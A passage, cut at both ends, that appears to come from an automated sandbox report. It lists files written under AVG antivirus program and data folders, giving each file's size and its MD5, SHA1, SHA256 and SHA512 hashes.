                                                                                      7c57ca4b284923406fe1400646415ca853dabf515d914f33d7dbf80f90bf463e3b872e41ced7cd65cd50659e32fd7994aa68bf6295a2b8333985444f42e6e19f

                                                                                    • C:\Program Files\AVG\AvVps\exts.dll

                                                                                      Filesize

                                                                                      22KB

                                                                                      MD5

                                                                                      fdb8509aaffe80e8807069c6aae1fe38

                                                                                      SHA1

                                                                                      8299fcc109b78836703f58acf1d3f356b3eee90a

                                                                                      SHA256

                                                                                      3a2a05189996d1a0cbb5b40cc410f5559a0a632dd7ee1bf29bbdc5561fdc0ebe

                                                                                      SHA512

                                                                                      288f19c9c683a806727b96bcc54a680ac060b3a680fccd201fcf0321020767d7bb6bb4d14d517618e037c4e87ad4e91cd6e4da8b4183a2d53ad4df51f16f9b99

                                                                                    • C:\Program Files\AVG\AvVps\fwAux.dll

                                                                                      Filesize

                                                                                      68KB

                                                                                      MD5

                                                                                      e4653b8281fdd85acdb3142c935b01ed

                                                                                      SHA1

                                                                                      7dee861b858da10c64509891a7f46da5df2869a5

                                                                                      SHA256

                                                                                      d69a1a93d78290e4780e3e991d05573459ed585419805aaf52bb0ed021d30e7c

                                                                                      SHA512

                                                                                      9af261ae4530140330f1106598b0912cf71a05e8a990c07b5e9f2c4290ff362aac0434d1a1802a7b946ab82dbba5bda86b048eb47b4d3c88b0129b73da850dc7

                                                                                    • C:\Program Files\AVG\AvVps\gvma64.dat

                                                                                      Filesize

                                                                                      10.9MB

                                                                                      MD5

                                                                                      1ec7c4feed230426245df226f55ff5af

                                                                                      SHA1

                                                                                      86cd49511bae8209a98689e9be55036e35c12554

                                                                                      SHA256

                                                                                      0d280884fb0a08c0e62dd5299df248501c9d94d9714b67990833bda5d592104d

                                                                                      SHA512

                                                                                      39b09da401b99360a9c404f46cbe2ab6d87a944d13ae367ae5aab0b768963fbbf9df66616dde11e53e12ce9216f3434332a7e8aa451e6c5cfe385a15f086b4ce

                                                                                    • C:\Program Files\AVG\AvVps\idp.dat

                                                                                      Filesize

                                                                                      2.8MB

                                                                                      MD5

                                                                                      cde7484d39ea5eb4b8f6dcd6e923f09d

                                                                                      SHA1

                                                                                      179fdc4be0b6565b4200b7add0a885e6f4cf7143

                                                                                      SHA256

                                                                                      842478ed448310f7506b3c84267b2d3ce3a501a22c22a38d6116b18c9332eac6

                                                                                      SHA512

                                                                                      e37aa7e6f7093a062924e4a7a13eadb2986a71e8189dfff7dce33cdfbf775a6a06786e17ca5f9f7cab1fab320b89b0028e9ebb1d0f6439488fcbbca03a814e8c

                                                                                    • C:\Program Files\AVG\AvVps\list_d.txt

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      0966b0f4daf1a0d86897515b8b9c631d

                                                                                      SHA1

                                                                                      289bfbea7eba37e406655f67297a0e5525961ca8

                                                                                      SHA256

                                                                                      474c9bf69903fc8e1fda91ca8fec20b79adbe28d47b05b97d55bfdf36e3cc7b7

                                                                                      SHA512

                                                                                      2f7d9c91b0205a8a873c54dce5dec925b4d3471b925cd7c8db4d652215b4937a82091566abd89b3aba96b3924c6ad3d092787e44dceb0ada2adff61a050d349a

                                                                                    • C:\Program Files\AVG\AvVps\list_i.txt

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      65b17ab393be8a3f0c945c2eacd71b31

                                                                                      SHA1

                                                                                      13e56b1c2d49e1141c276251a7a234606b8804bb

                                                                                      SHA256

                                                                                      1210506fb8aa9ec8a0fc2d857933ab3ca154844efcad4e993cb568aff910ae11

                                                                                      SHA512

                                                                                      a45859a5f970bce4d8e68ffd327483ac1c5317287a360055408ebf0297c8a1228f02c54ba3cef2103d9b5d4d09a4e0855c4ed9468adf8ea2f331a89cc59510c2

                                                                                    • C:\Program Files\AVG\AvVps\swhealthex2.dll

                                                                                      Filesize

                                                                                      2.4MB

                                                                                      MD5

                                                                                      3f64f9ecf3d99335557710fef46c8acf

                                                                                      SHA1

                                                                                      e433ad38b6b655269805e5af1768708056c78405

                                                                                      SHA256

                                                                                      9b30505cf82b06119203e75ff03f8074f7c17fc2d91446564e9d6e3eace91372

                                                                                      SHA512

                                                                                      99d941013136fcff5a7776041789c165d335b71aa714ef18624c899ea86afa7b28171d73a75cf1bd197905158e34a778207456ad44ede8c5e8f77ff33f7c0201

                                                                                    • C:\Program Files\AVG\AvVps\uiext.dll

                                                                                      Filesize

                                                                                      67KB

                                                                                      MD5

                                                                                      79d02278ea287701d2300ffd4822bf7c

                                                                                      SHA1

                                                                                      21a7d06995c4b6a707ed43bd141150be4b1f7da6

                                                                                      SHA256

                                                                                      829d13c5aee302288f7fc3abbe53fb5022fe16ec4624d65c02b52be3808bd89d

                                                                                      SHA512

                                                                                      f64b18aee923b5e39a826b8ee3690ef6de810ecbdea767ad8f3fea9974198d5f557a1b0af9dee1439743047de87b29916e00d2fe4ed6713cb2244a1e828c35e1

                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av-vps\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\config.def

                                                                                      Filesize

                                                                                      583B

                                                                                      MD5

                                                                                      88b8bbca6adfb658e9f64786290b1508

                                                                                      SHA1

                                                                                      a7e19f0be671882e7c0de8d546482d20045139de

                                                                                      SHA256

                                                                                      a98977649c4c1e25f732e3023515cac1cf5d54df88d58c170dde6f895bc695fc

                                                                                      SHA512

                                                                                      b7329cac2951e04645771d207dc0c095fe81dfa17bd3df185f4da1e1cc4f726750a48921fd97345b6777638e212624d4f0d3824d39f363d9421bbbffd44f3968

                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av-vps\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\icarus_product.dll

                                                                                      Filesize

                                                                                      852KB

                                                                                      MD5

                                                                                      7045e386d00a84dfa30089eb3a0d393d

                                                                                      SHA1

                                                                                      bccfbb3af88eb2cd6e6382447bd334abe64ebee3

                                                                                      SHA256

                                                                                      920b1f4f62fcdca79de87bc19f8dc303fa30a028eebec768b09c5d25bddb38da

                                                                                      SHA512

                                                                                      249b8acca384574f1b8326d0b99b1c71ded884909589d769c3d34d7b1e92fc1743caf880caaba9c7abd6e217b1cb97bfa52f5f94e3621273beeb1873bc262575

                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av-vps\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\product-def.xml

                                                                                      Filesize

                                                                                      57KB

                                                                                      MD5

                                                                                      218c8b941b349fae6d514ba098a13d02

                                                                                      SHA1

                                                                                      89fe6ee606a3f50ae81f8940956c6a437922a422

                                                                                      SHA256

                                                                                      f74b6293dfeac23740bbc02c614c555001da687b963d76e0d1a5aeae7a6f4053

                                                                                      SHA512

                                                                                      1ec88514739f9a39eccf22ce65691bae2c25c92e7b5567ae4e769206c29da302915ef2bae022608af3b7a554ff565b917d926e5bdbf3c60c4fa5204f0d6ebb56

                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av\securebrowser_setup.exe

                                                                                      Filesize

                                                                                      5.8MB

                                                                                      MD5

                                                                                      7072379466d4785eca2975862b7eb206

                                                                                      SHA1

                                                                                      f55aac4992d05238caa1c8f00460d22493936587

                                                                                      SHA256

                                                                                      9e30176d5d339c3fc4b4e0a94b6d144c3431ec3ed0062e3a6aa66951e4244397

                                                                                      SHA512

                                                                                      3c84d572b1aefb03490efa74fba270a1242d222f9416c33fdc08f7c6a263f06d74dd958d5f3572ad4d64924600b488fee89428ec7255ed8888e202c3425485e7

                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\config.def

                                                                                      Filesize

                                                                                      757B

                                                                                      MD5

                                                                                      264d61ef38e6f06891da07c11bf71436

                                                                                      SHA1

                                                                                      e4a258aa41ce4aaacdfa7f5c0f6f11d4859fe1b2

                                                                                      SHA256

                                                                                      96976bd5ecb653aded30321685e44a59886901652c031de101e3a13326d61387

                                                                                      SHA512

                                                                                      c818737bcb76b4d50673c8007118320f0b6081108f4934016a04167d5a8f4835393274438769e05276c5db79c5d9f5e4e3748788a1439c974bdf16b3d5dd6890

                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\icarus_product.dll

                                                                                      Filesize

                                                                                      6.0MB

                                                                                      MD5

                                                                                      e6c57a243f922ba5eadf2f1a674805d9

                                                                                      SHA1

                                                                                      709701f6ca054be481f119dab27053a64929dced

                                                                                      SHA256

                                                                                      153b57ce3f3cf5c811ad33b346ebae5f1c2521afc7986a7e4a17404170617a94

                                                                                      SHA512

                                                                                      44ac6d0a7f7b7d7d9cc8f5bc445d2b8b4597dd38243bbc1fbf6cf4dc2f16b8f407474f4b36f26131f16c81ecc4857bf41211f830dab9757350e1afea31c8b49e

                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\product-info.xml

                                                                                      Filesize

                                                                                      9KB

                                                                                      MD5

                                                                                      f8c5aa34a71e54c0fa083f4b66cabb46

                                                                                      SHA1

                                                                                      f2cf1959cfdbe4e57f22f3c84ced078157fa02c1

                                                                                      SHA256

                                                                                      25bb4b2fb2badfcac785c65a07eab34bfbe9dabb748a89f922c33c7ac4c21288

                                                                                      SHA512

                                                                                      64ed9a6cc5e767f10523c4aac8756998ef1b6d8e2621e5a88cf85505484774843ebd0a95fb3453c586d490ced8e0eba441c916ebaaa6a3ff173784d36ea10903

                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av\temp\asw-4b1c47d1-182d-4533-872e-ebabf336095c\ecoo.edat

                                                                                      Filesize

                                                                                      52B

                                                                                      MD5

                                                                                      631b38c3133bf2fdec7a31823aa9d524

                                                                                      SHA1

                                                                                      908f2d9b569f4f491c15ecd0937b625ae77aa48f

                                                                                      SHA256

                                                                                      78827234f1189dbb2b88d37610b5d46b7bcb3d215fd547318be156e82560164c

                                                                                      SHA512

                                                                                      fbdf3c6cee608ec2991f3dfe96498781599ddd8bdc97c6b6360946f771996bdf632ff5c84885baa8622f6d5936077f5d7a79ade4dfb49518a0ca95b361f48ae1

                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av\temp\asw-4b1c47d1-182d-4533-872e-ebabf336095c\eref.edat

                                                                                      Filesize

                                                                                      51B

                                                                                      MD5

                                                                                      e6b886c5860e0df97a65d7412e31e722

                                                                                      SHA1

                                                                                      c15ceea6cff4f91b656aaa74823b8cced8a2578c

                                                                                      SHA256

                                                                                      85259fdd3917ddd6aa5f86304de53bd70097f2c9a510ff99eea35fae1f4b3c9a

                                                                                      SHA512

                                                                                      c3d218786e4a00b50a0a43d3ff799d21f586c15c6417e1dfe55360cec08b9b76e840635793aa6176f221a53eb733fb48407f3953f8796b2b325d2d7d44f40aa4

                                                                                    • C:\ProgramData\AVG\Antivirus\Fonts\OpenSans-Bold.ttf

                                                                                      Filesize

                                                                                      219KB

                                                                                      MD5

                                                                                      50145685042b4df07a1fd19957275b81

                                                                                      SHA1

                                                                                      c1691e8168b2596af8a00162bac60dbe605e9e36

                                                                                      SHA256

                                                                                      5894a3649b213cf5b2d673b6e7a871815fd1d120fa68a463592f27db14eae323

                                                                                      SHA512

                                                                                      9c995725aade5f126c727faf1c4453344e37b590a14152d31d44dca3c9328a54207bbc7c840695cb55bc1b559097b457888655e11199192cd5197c85aab8b1b6

                                                                                    • C:\ProgramData\AVG\Antivirus\Fonts\OpenSans-Italic.ttf

                                                                                      Filesize

                                                                                      207KB

                                                                                      MD5

                                                                                      c7dcce084c445260a266f92db56f5517

                                                                                      SHA1

                                                                                      f1692eac564e95023e4da341a1b89baae7a65155

                                                                                      SHA256

                                                                                      a54dc8488f8193bf30c3820cf6f261f911f9d328d699e1a1b8042641554cec70

                                                                                      SHA512

                                                                                      0fe7ec4c8eceafe87fbbdb9780519faffb646a23579ce5a4f5170808284c1ed85b9aafdab18cc4ddcaa9a7e6e2559fa6ed984d986ba93d1bbf4bc0551d5661d0

                                                                                    • C:\ProgramData\AVG\Antivirus\Fonts\OpenSans-Light.ttf

                                                                                      Filesize

                                                                                      217KB

                                                                                      MD5

                                                                                      1bf71be111189e76987a4bb9b3115cb7

                                                                                      SHA1

                                                                                      40442c189568184b6e6c27a25d69f14d91b65039

                                                                                      SHA256

                                                                                      cf5f5184c1441a1660aa52526328e9d5c2793e77b6d8d3a3ad654bdb07ab8424

                                                                                      SHA512

                                                                                      cb18b69e98a194af5e3e3d982a75254f3a20bd94c68816a15f38870b9be616cef0c32033f253219cca9146b2b419dd6df28cc4ceeff80d01f400aa0ed101e061

                                                                                    • C:\ProgramData\AVG\Antivirus\Fonts\OpenSans-Regular.ttf

                                                                                      Filesize

                                                                                      212KB

                                                                                      MD5

                                                                                      629a55a7e793da068dc580d184cc0e31

                                                                                      SHA1

                                                                                      3564ed0b5363df5cf277c16e0c6bedc5a682217f

                                                                                      SHA256

                                                                                      e64e508b2aa2880f907e470c4550980ec4c0694d103a43f36150ac3f93189bee

                                                                                      SHA512

                                                                                      6c24c71bee7370939df8085fa70f1298cfa9be6d1b9567e2a12b9bb92872a45547cbabcf14a5d93a6d86cd77165eb262ba8530b988bf2c989fadb255c943df9b

                                                                                    • C:\ProgramData\AVG\Antivirus\Fonts\RobotoCondensed-Bold.ttf

                                                                                      Filesize

                                                                                      138KB

                                                                                      MD5

                                                                                      52f9b35f9f7cfa1be2644bcbac61a983

                                                                                      SHA1

                                                                                      c348d9f1b95e103ac2d14d56682867368f385b1a

                                                                                      SHA256

                                                                                      28a1d37668b4cf94fff5256e9639f175baf4dd654ec84ba910485d38beefa6bd

                                                                                      SHA512

                                                                                      de48b5e6751134c7fcaa8ee4c734e0f458e86fc59249ef19d9c45b7098eb7273c4119d5944332465080154a3d9c8acdb1aa84ccce011bbe5c7f32251acde6cad

                                                                                    • C:\ProgramData\AVG\Antivirus\Fonts\RobotoCondensed-Regular.ttf

                                                                                      Filesize

                                                                                      137KB

                                                                                      MD5

                                                                                      0e1821fdf320fddc0e1c2b272c422068

                                                                                      SHA1

                                                                                      c722696501a8663d64208d754e4db8165d3936f6

                                                                                      SHA256

                                                                                      4a7c36df4318fee50a8159c3a0ebde4572abab65447ae4a651c2fe87212302b5

                                                                                      SHA512

                                                                                      948adb943bfae5807e0e88a23364d8e706a8bdfe8c4d00592a95cdd34081a64a8d44c4ba6e33a65874ac8a7117927c3de2b995fdc57c2746aedd7161df727293

                                                                                    • C:\ProgramData\AVG\Antivirus\Fonts\proximanova-bold.otf

                                                                                      Filesize

                                                                                      109KB

                                                                                      MD5

                                                                                      0018751ac22541e269f7c8e0df8385f6

                                                                                      SHA1

                                                                                      541e47f0b29737b74c2758b1f040783485de2a6d

                                                                                      SHA256

                                                                                      9f4d35bd7ca167c7659a872bdae6fde11c306b07eb5c758bae762f7258b39071

                                                                                      SHA512

                                                                                      6b6465848cdc0fb24ff2b1953e71b17c19e5e4224857df761222224778b4659443e8ce21bea15c76abfbcd9e371e607a0c1a94addbe761c2f07c1648971406c8

                                                                                    • C:\ProgramData\AVG\Antivirus\Fonts\proximanova-light.otf

                                                                                      Filesize

                                                                                      107KB

                                                                                      MD5

                                                                                      b7913e898d3cddf10a49ad0dc3f615b8

                                                                                      SHA1

                                                                                      560917b699fe57632d13cf8ef2778f3833748343

                                                                                      SHA256

                                                                                      1e90e49b182c8b5876ee6805ff3cd2e39a23fda79df33d2e8b57020d6f208334

                                                                                      SHA512

                                                                                      baee3e6114fb8b4f946cd85fac7bae19e1cc681820c6c5824092ad955e70ce7253ae471aaa28ad97412e67d4a9c741137bf3ff27233bd94b6d3a654f72adee16

                                                                                    • C:\ProgramData\AVG\Antivirus\Fonts\proximanova-regular.otf

                                                                                      Filesize

                                                                                      107KB

                                                                                      MD5

                                                                                      9372d1cc640df70d36b24914adf57110

                                                                                      SHA1

                                                                                      374508b24ea24906f25655de27e854e69cda2935

                                                                                      SHA256

                                                                                      31daba103891abf8b4d0537661117a8689c9ee5d91ee264f74e64ef1bb37a61c

                                                                                      SHA512

                                                                                      8100e80e7c7a6283a348fb0c2f9339600dca96f8db21e49c3c875ca6c0129d87452ca0d678904e40f65404f5c78b37a82718def85efc085d5f2c9d0ff94182d4

                                                                                    • C:\ProgramData\AVG\Antivirus\HtmlData\Blocked.htm

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      94aa8569ec9b33e05f3088b136dda05a

                                                                                      SHA1

                                                                                      2e7779731351517e2e6df18b313e5df28079160b

                                                                                      SHA256

                                                                                      179fcd4c70b0e5958c56387c7849e4b49e695a284b75471a15a8e6c8637eeefd

                                                                                      SHA512

                                                                                      52cc30da7dc6e6ae7266bf171e4e9c9e16c0d8bf72abda793a0f03e2889eda6171044ed65960fd2c40251b135015a0fa62132c76cf16065ef6fa47476b6d8ff2

                                                                                    • C:\ProgramData\AVG\Antivirus\HtmlData\image001.png

                                                                                      Filesize

                                                                                      11KB

                                                                                      MD5

                                                                                      c69e876c8bc4f3bca56ba333eaae7a71

                                                                                      SHA1

                                                                                      d00ac516dadf10b6a9fbaa8b6fd7f7800511d36e

                                                                                      SHA256

                                                                                      d1e88cc6880e3667b06b2d006f5fb8516f28467dd1153453c1bf954571fc4f00

                                                                                      SHA512

                                                                                      3453ec35e83ed63f2e88326c1a3f4ee23a6b979d272243131c37bb06ce8d2467585e311a3c01198f3384d852ee9fe525434f8a6eb58b7698c0c8c56b7a8f3b40

                                                                                    • C:\ProgramData\AVG\Antivirus\fw\config.xml.ipending.33edda96

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      60424032333d4723d7f4ff7543a7aa76

                                                                                      SHA1

                                                                                      1fa9fa26b21439adcd5258727f9cd0b954d0f5a1

                                                                                      SHA256

                                                                                      be79affc10f1d93f9ae438c6320feed7846bcb0950cd32e8a564eeb59203b6ea

                                                                                      SHA512

                                                                                      859a800dfd2de9f0bc0f5e81a8f0ab80eefcb56fe0a9e634ab8cd13881ffd26e13448529d9a0d096a61d5f1e410eead06dac75a91b09faf7f692d8884a41456c

                                                                                    • C:\ProgramData\AVG\Antivirus\fw\macaddr.db.ipending.33edda96

                                                                                      Filesize

                                                                                      400KB

                                                                                      MD5

                                                                                      4d0a40f5714712c5f1175769a93666ac

                                                                                      SHA1

                                                                                      2c57f1bdebe1bea9ccfa06bf42c967154d35dd41

                                                                                      SHA256

                                                                                      397c21a562d5824dd87e2c34a60f2b3e8b678d52a7bc7297ba5828e4d7b9cf4b

                                                                                      SHA512

                                                                                      953ead668e3f48e820209674dd894a1fc6482bc53d3143ddd45a37ebf416982f126825eeb7f8a9f43644d53c2c47b420f95c95289427765ab14b28ec476f1e89

                                                                                    • C:\ProgramData\AVG\Antivirus\fw\networks.xml.ipending.33edda96

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      75128eadc720b56babb24ac629172155

                                                                                      SHA1

                                                                                      83bc1da43e4f51326713e43a44625987507b4467

                                                                                      SHA256

                                                                                      130a4428ee45f3a17252aa797cfaa35d8e71070dcccbc6059b31eaa087c5f5f8

                                                                                      SHA512

                                                                                      da45704247caf68c7deb59f587f392eb431a1ad89a653b78b7d6af286f6c6af7676575fcbc310679e4043040038f5ca3e0ef0167f6f6aa199bd4007291a39c57

                                                                                    • C:\ProgramData\AVG\Antivirus\fw\ports.xml.ipending.33edda96

                                                                                      Filesize

                                                                                      11KB

                                                                                      MD5

                                                                                      b27bb54e1fce83e05eb13c960c19b357

                                                                                      SHA1

                                                                                      5b7931054732cc7cea414b90cb37aa329122d7a7

                                                                                      SHA256

                                                                                      6c26bf93abfd6f2878b608f6169e46be2365644e9de78c0b9e3177f3d0aff0af

                                                                                      SHA512

                                                                                      82a5f72ebe55e79a6cdd7449aede0945db9734146c4b6d08249bc31010393bdbeb65de861e6cf24168dd25519db7d55498e34eb3c85c6bc5a1f707e2a0149e90

                                                                                    • C:\ProgramData\AVG\Antivirus\fw\rules.xml.ipending.33edda96

                                                                                      Filesize

                                                                                      34KB

                                                                                      MD5

                                                                                      2fc4e6e0dc7816f855189f4018d1c935

                                                                                      SHA1

                                                                                      141f4aaa087369ea2b872e21b292f44afa611e71

                                                                                      SHA256

                                                                                      5aa5a5d5a9061a50c93893f88ca06a53d78550640c417759a44341a11be915be

                                                                                      SHA512

                                                                                      6f3b2ffc4260ab36b1e02206c9cddcbb8d9520619436157947179031b18585c0ccc57fced9860198fbbd74e8781c84b23d5f0b38b5dcffcbab731e1a60cfbede

                                                                                    • C:\ProgramData\AVG\Antivirus\fw\templates.xml.ipending.33edda96

                                                                                      Filesize

                                                                                      190KB

                                                                                      MD5

                                                                                      8a30b27740546e1450bc36d66d5c229d

                                                                                      SHA1

                                                                                      80018e8c66a14aae7c014f5fcd2435419917b7fe

                                                                                      SHA256

                                                                                      425012b48ec1638d0f3f29060ea475a37152994c841c47dc0244063dba2ef254

                                                                                      SHA512

                                                                                      0053420ec01554849abff44b53265b8176223826d43046f377e8ee7ea42ec0e0295bc1f0c1774e34e223d7c976e6cb9695f9986c70ad93b8673473705749e13b

                                                                                    • C:\ProgramData\AVG\Antivirus\gaming_mode\dnddetection.dat

                                                                                      Filesize

                                                                                      542KB

                                                                                      MD5

                                                                                      0bd42763975dc54ad5efdcd321c750cb

                                                                                      SHA1

                                                                                      24202455a58c7ced31240a90603c6489728bbfce

                                                                                      SHA256

                                                                                      4845a0d7b287399933536c12ad5549fa4f4d49f42500c7311dc2c3c108480a7c

                                                                                      SHA512

                                                                                      9204678ddef894657c0f6bd5451294e104ffdea90dae12fc3f642547debb80435b0cc9d08680f50482bc1236daf5ae1cd79c322eadcde7765e9e251231753e79

                                                                                    • C:\ProgramData\AVG\Antivirus\gaming_mode\dnddetection.dat.ver

                                                                                      Filesize

                                                                                      2B

                                                                                      MD5

                                                                                      9bf31c7ff062936a96d3c8bd1f8f2ff3

                                                                                      SHA1

                                                                                      f1abd670358e036c31296e66b3b66c382ac00812

                                                                                      SHA256

                                                                                      e629fa6598d732768f7c726b4b621285f9c3b85303900aa912017db7617d8bdb

                                                                                      SHA512

                                                                                      9a6398cffc55ade35b39f1e41cf46c7c491744961853ff9571d09abb55a78976f72c34cd7a8787674efa1c226eaa2494dbd0a133169c9e4e2369a7d2d02de31a

                                                                                    • C:\ProgramData\AVG\Antivirus\gaming_mode\dndrules.dat

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      1527c1fd5da898c3bdb68b8a105937a4

                                                                                      SHA1

                                                                                      d0f9fd4a698f91f54f78dd2043c1349a7e4ae7f3

                                                                                      SHA256

                                                                                      c269c9e66b2acdace62e8ab631f39c24801c4644193bb3934a8dea3c43f669df

                                                                                      SHA512

                                                                                      d574498392a55b47dc81276d63a33e9870232e77f60ac0d78c9bd29e3d419d015a19241e86a7963191643f6c0d0fd2db613ca5290d559c3801358a60fd5cd27b

                                                                                    • C:\ProgramData\AVG\Antivirus\gaming_mode\dndrules.dat.ver

                                                                                      Filesize

                                                                                      1B

                                                                                      MD5

                                                                                      c4ca4238a0b923820dcc509a6f75849b

                                                                                      SHA1

                                                                                      356a192b7913b04c54574d18c28d46e6395428ab

                                                                                      SHA256

                                                                                      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                      SHA512

                                                                                      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                    • C:\ProgramData\AVG\Antivirus\overseer_unattend.xml

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      1a90bc8644262cd79e806a222f38e95e

                                                                                      SHA1

                                                                                      0b9dc24a50654a32e0d5974f9f4370bac30a90f1

                                                                                      SHA256

                                                                                      1210aec78a7a836e56e94accf4eea74d5c0f26c2dbb25ae4d6023886ed3c9d64

                                                                                      SHA512

                                                                                      4f67699dc93ee7df09c4657a9fffbeb1f34ac615eea55d169ac03f7f58c50640c968f4215ede9dc59b5660166a9e2392fe10b8f2f68f6b067e9631c94c805941

                                                                                    • C:\ProgramData\AVG\Antivirus\profile.wprp

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      ad6bb231d6ca341d585caa0881bbc680

                                                                                      SHA1

                                                                                      249d7ed96bd7368985770fc91243ffc27a6787e8

                                                                                      SHA256

                                                                                      362c8627a8cde159dc2b52d1c3315c4499dafc8a5a6781acb373307453584785

                                                                                      SHA512

                                                                                      70c0943d74381c9b00b59cf28297211905a983c3c5b0203d71d9f28a1367c01d821f329aee1fef6d2b04f2ad6552e32d5c7f7eb8ec053691d2d1f6b21940694e

                                                                                    • C:\ProgramData\AVG\Antivirus\settings-24.3.8975.1651.ori

                                                                                      Filesize

                                                                                      9KB

                                                                                      MD5

                                                                                      d6d47f2fc4249066cf91a53c7b920259

                                                                                      SHA1

                                                                                      12fd18a223a52963e0365362cf1e350355d9c8e3

                                                                                      SHA256

                                                                                      1a42bc373998c605dfa8d4df5e2705e1c209326ed578bc67ebe0f3dedd2a2951

                                                                                      SHA512

                                                                                      19cdfe62d19bf5073f28d6693412585843c113d85b4a3e01460fcefe76aa1c85a1e908e8d89016eb804a4a875a9ed5f99499b254e673074e393981482c21d209

                                                                                    • C:\ProgramData\AVG\Antivirus\snx_gconfig.xml

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      db89473157a2109d2cc065b9c62acd27

                                                                                      SHA1

                                                                                      d903a0ed7c5aa5a686c883a597894657a8c0beb9

                                                                                      SHA256

                                                                                      2b8d115e38b1ac4ea4fe0ea24006e4e2d7e6429f469b4ff0f1ea45fee4e7e8d6

                                                                                      SHA512

                                                                                      41486f90632e52127358b7a6046b347d47ffbdd62970ed67980b56c247f68ece4d7d0250e19c28c7045ab3d4c9d7db40e1aeaf2a4ab33d6ae4b591f05ebe3d3b

                                                                                    • C:\ProgramData\AVG\Icarus\Logs\event_manager.log

                                                                                      Filesize

                                                                                      281B

                                                                                      MD5

                                                                                      0ac487ebb64b5f0cbc27251e6c022807

                                                                                      SHA1

                                                                                      d108f35d6a23e1acfe28d90ed79e9e9d3d28de49

                                                                                      SHA256

                                                                                      9293113496611130e3b934e77c6809d37a4e28a783a1ed8f41b5fe1b4fcc876e

                                                                                      SHA512

                                                                                      0c868f8ca3c4be2ccdf82f3294dec12e1457ecea13ba32c18728375d7b7e692832c4faf2837b5ed6b2c191d083d27ce186c19675addc1737fe5c2d49a127e9ed

                                                                                    • C:\ProgramData\AVG\Icarus\Logs\icarus.log

                                                                                      Filesize

                                                                                      2.7MB

                                                                                      MD5

                                                                                      2224b42b5c56f61e0cc3366d20f63111

                                                                                      SHA1

                                                                                      df71492b1e18fc4d665a09c8e1b169f748232356

                                                                                      SHA256

                                                                                      0949121356388d18dc44cb6f5553ad84de27f544fbf23b60fe2cb5d5ec7f55cb

                                                                                      SHA512

                                                                                      1de74a94e4e406a27445f6843c9aa9af86b114fb1fe9e8624aa23e8bf16517d3fb8a93b81f4e4fa0f037fb4ea15bd6be4202a7077cf52493d8ea84ea1f10a6fd

                                                                                    • C:\ProgramData\AVG\Icarus\avg-av-vps\icarus.ini

                                                                                      Filesize

                                                                                      158B

                                                                                      MD5

                                                                                      3c28e285db12f32a88606f5c0a8c424a

                                                                                      SHA1

                                                                                      3112cba6bb525549022aa28bcf55952e168e4f93

                                                                                      SHA256

                                                                                      226bf72377b3d4a1046984c2ec7ddc12d073c43d48e37448cd5d4d5d5d2aabc7

                                                                                      SHA512

                                                                                      35d923ee1093f3c3090e9baa48464d8866c22d116ac92f0823ef7e98c6409330b06140c1d2b1fb51572ce187f23bb3e9fdca49528b1f0678f4aac413a0df5b7a

                                                                                    • C:\ProgramData\AVG\Icarus\avg-av-vps\icarus.ini

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      33736b99d7cad55d6ddc9e04fe2dad61

                                                                                      SHA1

                                                                                      d55743a4b2ed05440307da97bf1a481226a3b71e

                                                                                      SHA256

                                                                                      4b6c836050c89f183b2bda3b85fb90ae99f26b1cc347b310e09ee3be3ca504df

                                                                                      SHA512

                                                                                      4ddbce0a6288b082f9307db130edbac55a31ceb80aea450550077c5c5a996dd815db14853d0cc0509a46e9c574074b156d55444248cfaa0305920d50bffb30bf

                                                                                    • C:\ProgramData\AVG\Icarus\avg-av\icarus.ini

                                                                                      Filesize

                                                                                      166B

                                                                                      MD5

                                                                                      c043a3beb23cc43cb3e9acae2ad9d8b4

                                                                                      SHA1

                                                                                      f8a300a14643d9d2ef708839d882fa8fae274f73

                                                                                      SHA256

                                                                                      3df024f72a0bcdd90a7c140591e224492481eb7f32a940bfb9af1cdb6472af9e

                                                                                      SHA512

                                                                                      e5baa81e296b7f06360ed20d9484a137ca49c0505d2c94947b978b09b277f13184e540098e21daad0a72d8ddd831a57d6ac0e67c0aa860d87a051b55c3c9fff2

                                                                                    • C:\ProgramData\AVG\Icarus\avg-av\icarus.ini

                                                                                      Filesize

                                                                                      4KB

                                                                                      MD5

                                                                                      a41ef6ceee39e7921f56a98cd04df975

                                                                                      SHA1

                                                                                      42e2e8dab6bd118da7941d34c43f8d9c637cfec3

                                                                                      SHA256

                                                                                      a2d9a5ec3d7615a873e9060f22ab25a44023abfe4d336edb19b3d097b9aa3a0e

                                                                                      SHA512

                                                                                      34672ec0555d9f6eb3685d36d6a7db4af8278f65585e4057d70c9e9fc9c41173dc1468eb6b3583ba81b4c84a2ba22e164e022adf8d05fd591d669a451a709edc

                                                                                    • C:\ProgramData\AVG\Persistent Data\Antivirus\Logs\AvEmUpdate.log

                                                                                      Filesize

                                                                                      1KB

